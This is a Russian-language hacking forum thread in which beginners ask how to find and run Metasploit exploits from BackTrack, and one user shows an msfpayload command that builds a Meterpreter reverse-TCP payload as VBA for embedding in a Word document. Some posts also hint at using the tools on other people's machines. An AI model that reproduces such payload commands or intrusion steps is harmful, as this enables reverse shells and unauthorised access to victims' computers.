Доброго всем времени суток!

В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:

никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?

Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает?

З.Ы. в манах ничего не нашел =(

И хотел бы уточнить, правильно ли я понимаю порядок действий?

1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий

2. находение сплоита отвечающего требованиям найденного, и конечной цели

3. использование сплоита с начинкой.

Зарание спасибо.

Юдат said:
Доброго всем времени суток!
В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:
никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?
Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает?
З.Ы. в манах ничего не нашел =(
И хотел бы уточнить, правильно ли я понимаю порядок действий?
1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий
2. находение сплоита отвечающего требованиям найденного, и конечной цели
3. использование сплоита с начинкой.
Зарание спасибо.


Приветствую всё правелоно только целевая тачка должна быть с тобою в одной сети или прямой IP с обеех старон.

Ну и автоподбор эксплойта рекомендую fast-track.

ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается))

????

dupD0M said:
ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается))
????


С другом твоим в локалке)))

Здравствуйте. у меня такая проблемка

прописываю msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port V > test.bas

после это создаю вордовский документ .doc вставляю туда test.bas через visual basic и когда нажимаю сохранить выводит ошибку "сбой сохранения из-за недостатка памяти или места на диске"

места на диске 30 гб

подскажите в чем проблема?

спасибо.

после запуска сплоита получаю вот такой ответ

Started reverse double handler

Sending Backdoor Command

[-] Not backdoored

Exploit completed, but no session was created.

это значит что просто не удалось создать обратную связь (плохая начинка)? или что эксплойт не сработал?

Юдат said:
Доброго всем времени суток!
В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:
никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?
Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает?
З.Ы. в манах ничего не нашел =(
И хотел бы уточнить, правильно ли я понимаю порядок действий?
1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий
2. находение сплоита отвечающего требованиям найденного, и конечной цели
3. использование сплоита с начинкой.
Зарание спасибо.


А не мог бы ты подробнее описать как и чем ты все это делаешь)) команды хочу узнать)

ConnectOFF said:
А не мог бы ты подробнее описать как и чем ты все это делаешь)) команды хочу узнать)


/thread21599-Metasploit.html (https://antichat.live/threads/21599/)